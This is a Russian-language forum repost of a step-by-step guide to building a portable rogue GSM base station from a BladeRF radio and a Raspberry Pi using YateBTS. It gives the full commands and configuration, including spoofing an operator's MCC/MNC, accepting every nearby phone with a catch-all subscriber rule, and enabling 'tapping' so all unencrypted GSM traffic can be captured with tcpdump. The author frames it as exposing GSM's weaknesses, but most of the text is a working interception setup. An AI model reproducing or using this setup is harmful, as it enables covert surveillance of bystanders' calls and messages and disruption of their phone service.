КАК СОЗДАТЬ СВОЙ СОБСТВЕННЫЙ ROGUE GSM BTS ДЛЯ УДОВОЛЬСТВИЯ И ПОЛУЧЕНИЯ ПРИБЫЛИ

Тема в разделе "Сотовая связь", создана пользователем Транклюкатор, 7 апр 2019.

  1. Транклюкатор

    Транклюкатор Господин ПЖ

    На прошлой неделе я был в гостях у моего друга и коллеги Зигги в Тель-Авиве, который дал мне то, чего я ждал почти год, - совершенно новый BladeRF x40 , недорогую программно-определяемую радиостанцию USB 3.0, работающую в дуплексном режиме. Это означает, что он может передавать и получать одновременно (в то время как, например, HackRF является только полудуплексом).

    В этой записи блога я собираюсь объяснить, как создать портативную GSM BTS, которую можно использовать либо для создания частной (и бесплатной сети!) Сети GSM, либо для активного прослушивания / перехвата / перехвата GSM ... да, с некоторыми (относительно Из дешевого электронного оборудования вы можете построить нечто очень похожее на то, что правительства годами используют для осуществления GSM-перехвата.

    Я не пишу этот пост, чтобы помочь детям-сценаристам, нарушающим закон, я хочу сказать, что GSM не работает по замыслу, и пришло время поставщикам что-то с этим сделать, учитывая, сколько мы платим за их услуги.

    [​IMG]

    Требования к оборудованию[/paste:font]
    Для сборки вашей BTS вам понадобится следующее оборудование:

    Программного обеспечения
    Давайте начнем с установки последнего образа Raspbian на карту micrsd (используйте «облегченный», нет необходимости в пользовательском интерфейсе;)), загрузите RPI, настройте WiFi или Ethernet и т. Д., В конце этого процесса вы должны быть в состоянии SSH в RPI.

    Затем установите несколько зависимостей, которые нам скоро понадобятся:

    sudo apt-get install git apache2 php5 bladerf libbladerf-dev libbladerf0 automake

    На этом этапе вы уже должны иметь возможность взаимодействовать с BladeRF, подключить его к одному из USB-портов RPI, dmesg должен сообщить вам что-то вроде:

    [ 2332.071675] usb 1-1.3: New USB device found, idVendor=1d50, idProduct=6066
    [ 2332.071694] usb 1-1.3: New USB device strings: Mfr=1, Product=2, SerialNumber=3
    [ 2332.071707] usb 1-1.3: Product: bladeRF
    [ 2332.071720] usb 1-1.3: Manufacturer: Nuand
    [ 2332.071732] usb 1-1.3: SerialNumber: b4ef330e19b718f752759b4c14020742

    Запустите утилиту bladeRF-cli и введите команду version :

    pi@raspberrypi:~ $ sudo bladeRF-cli -i
    bladeRF> version
    bladeRF-cli version: 0.11.1-git
    libbladeRF version: 0.16.2-git
    Firmware version: 1.6.1-git-053fb13-buildomatic
    FPGA version: 0.1.2
    bladeRF>

    ВАЖНО Убедитесь, что у вас есть именно эти версии прошивки и FPGA, другие версии могут не работать в нашей настройке.

    Загрузите правильную прошивку и образ FPGA.


    Теперь мы собираемся установить Yate и YateBTS, две программы с открытым исходным кодом, которые позволят нам создавать саму BTS.

    Так как я потратил много времени, пытаясь выяснить, какая конкретная версия была совместима с bladeRF, я создал репозиторий github с правильными версиями обоих, поэтому в вашей домашней папке RPI просто выполните:

    git clone https://github.com/evilsocket/evilbts.git
    cd evilbts

    Давайте начнем строить их обоих:

    cd yate
    ./autogen.sh
    ./configure --prefix=/usr/local
    make -j4
    sudo make install
    sudo ldconfig
    cd ..
    cd yatebts
    ./autogen.sh
    ./configure --prefix=/usr/local
    make -j4
    sudo make install
    sudo ldconfig

    Это займет несколько минут, но в конечном итоге все будет установлено в вашей системе.

    Далее мы будем ссылаться на веб-интерфейс NIB в нашей папке apache www:

    cd /var/www/html/
    sudo ln -s /usr/local/share/yate/nib_web nib

    И предоставьте разрешение на запись в файлы конфигурации:

    sudo chmod -R a+w /usr/local/etc/yate

    Теперь вы можете получить доступ к своему веб-интерфейсу BTS из браузера:

    http://ip-of-your-rpi/nib

    Время для некоторой конфигурации сейчас!

    конфигурация
    Откройте файл /usr/local/etc/yate/ybts.conf с помощью nano или vi и обновите следующие значения:

    Radio.Band=900
    Radio.C0=1000
    Identity.MCC=YOUR_COUNTRY_MCC
    Identity.MNC=YOUR_OPERATOR_MNC
    Identity.ShortName=MyEvilBTS
    Radio.PowerManager.MaxAttenDB=35
    Radio.PowerManager.MinAttenDB=35

    Вы можете найти действительные значения MCC и MNC здесь .

    Теперь отредактируйте /usr/local/etc/yate/subscribeers.conf :

    country_code=YOUR_CONTRY_CODE
    regexp=.*

    ПРЕДУПРЕЖДЕНИЕ Использование регулярного выражения . * Сделает КАЖДЫЙ телефон GSM в вашем регионе подключенным к вашей BTS.

    В веб-интерфейсе NIB вы увидите что-то вроде этого:

    [​IMG]

    Включить GSM-прослушивание
    На панели «Нажатие» вы можете включить ее как для GSM, так и для GPRS, это в основном будет «сбрасывать» каждый пакет GSM на интерфейс обратной связи, поскольку мы не настроили шифрование , вы сможете увидеть все GSM трафик, просто tcpdump-ваш интерфейс обратной связи: D

    [​IMG]

    Начни это!
    Наконец, вы можете запустить новую BTS, выполнив команду (с подключенным BladeRF!):

    sudo yate -s

    Если все настроено правильно, вы увидите кучу сообщений и строку:

    Starting MBTS...
    Yate engine is initialized and starting up on raspberrypi
    RTNETLINK answers: File exists
    MBTS ready

    В этот момент средний светодиод для вашего bladeRF должен начать мигать.

    Попробуй это!
    Теперь телефоны начнут автоматически подключаться, это произойдет из-за самой реализации GSM:

    • Вы можете установить любые MCC, MNC и LAC, которые вам нравятся, фактически подделывая любую законную GSM BTS .
    • Каждый телефон будет искать BTS своего оператора и выбирать тот, у которого самый сильный сигнал ... угадайте, какой из них будет самым сильным? Да ... наши: D
    Вот фотография, сделанная моим Samsung Galaxy S6 (с помощью приложения Network Cell Info Lite ), который автоматически подключается к моей BTS через 3 минуты:

    [​IMG]

    Отныне вы можете настроить BTS так, чтобы вы делали все, что хотите ... либо выступать в роли «прокси» для легального SMC (с ключом GSM / 3g USB) и прослушивать незашифрованный GSM-трафик каждого телефона, либо создавать частный Сеть GSM, где пользователи могут общаться бесплатно, используя SIP, см. Вики-сайт YateBTS для конкретных конфигураций.

    Ну и конечно, если подключить батарею USB, вся система станет полностью портативной :)

    Ссылки и дальнейшие чтения
     

Поделиться этой страницей